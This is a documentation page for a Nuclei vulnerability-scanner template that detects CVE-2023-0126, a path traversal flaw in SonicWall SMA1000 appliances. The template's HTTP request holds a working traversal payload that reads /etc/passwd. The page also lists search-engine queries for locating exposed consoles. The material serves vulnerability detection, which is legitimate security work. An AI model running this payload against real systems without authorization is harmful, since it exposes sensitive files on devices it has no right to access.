Skip to content
Nuclei Templates

SonicWall SMA1000 LFI

ID: CVE-2023-0126

Severity: high

Author: tess

Tags: cve2023,cve,sonicwall,lfi,sma1000

Description

Section titled “Description”

Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.

YAML Source

Section titled “YAML Source”
id: CVE-2023-0126


info:
  name: SonicWall SMA1000 LFI
  author: tess
  severity: high
  description: |
    Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the affected device, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0126
    - https://github.com/advisories/GHSA-mr28-27qx-phg3
    - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0001
    - https://github.com/Gerxnox/One-Liner-Collections
    - https://github.com/thecybertix/One-Liner-Collections
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-0126
    cwe-id: CWE-22
    epss-score: 0.29128
    epss-percentile: 0.96882
    cpe: cpe:2.3:h:sonicwall:sma1000:-:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: sonicwall
    product: sma1000
    shodan-query: title:"Appliance Management Console Login"
    fofa-query: title="appliance management console login"
    google-query: intitle:"appliance management console login"
  tags: cve2023,cve,sonicwall,lfi,sma1000


http:
  - method: GET
    path:
      - '{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd'


    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - content/unknown


      - type: regex
        regex:
          - "root:[x*]:0:0"


      - type: status
        status:
          - 200
# digest: 490a0046304402204d0f6dad220d8b068b4cf9975e760d2929b03a16149539f461d33bd1deab0b990220648b21acfff44a6b8edb6ef1ee29dd9bdfd683ab130c1802e2173b07e809edfc:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-0126.yaml"

View on Github